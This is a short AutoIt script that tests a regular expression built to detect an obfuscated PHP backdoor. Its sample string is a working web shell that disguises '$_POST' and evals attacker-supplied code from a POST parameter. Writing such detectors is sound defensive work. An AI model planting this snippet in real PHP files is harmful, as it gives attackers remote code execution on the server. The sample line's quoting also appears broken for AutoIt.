#include <StringConstants.au3> ; to declare the Constants of StringRegExp
#include <Array.au3> ; UDF needed for _ArrayDisplay and _ArrayConcatenate
Local $sRegex = "(?m)<\?php\s+\$[a-z].+?strtoupper.+?isset.+?eval\s*\(\s*\${\s*\$[a-z0-9]+\s*}\s*\[\s*'[a-z0-9]+'\s*\]\s*\);\s*}\s*\?>\s*"
Local $sString = "<?php $lin3 = "sotp_";$pim6=strtoupper( $lin3[4].$lin3[3] . $lin3[1]. $lin3[0]. $lin3[2] ) ; if (isset ( ${$pim6} ['q23f412' ]) ){eval( ${$pim6}['q23f412' ] );} ?>"
Local $aArray = StringRegExp($sString, $sRegex, $STR_REGEXPARRAYGLOBALFULLMATCH)
Local $aFullArray[0]
For $i = 0 To UBound($aArray) -1
_ArrayConcatenate($aFullArray, $aArray[$i])
Next
$aArray = $aFullArray
; Present the entire match result
_ArrayDisplay($aArray, "Result")